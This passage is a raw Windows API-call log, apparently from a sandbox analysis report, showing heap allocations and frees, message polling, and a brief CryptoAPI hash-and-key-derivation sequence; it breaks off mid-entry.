0x6bb5e8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.432] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.432] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.432] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.432] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.432] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.432] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.432] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0075.432] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.432] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.433] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.433] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.433] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.433] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e10 [0075.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.433] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.433] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.434] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.434] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.435] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.435] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.435] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.435] CryptHashData (hHash=0x6b89f8, pbData=0x6f96a8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.436] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e10 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.436] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.436] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.436] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.436] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.437] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8ab8) returned 1 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.437] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a10a0 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.437] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.437] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.437] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.437] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.437] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.438] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.438] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.438] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.438] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.440] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: 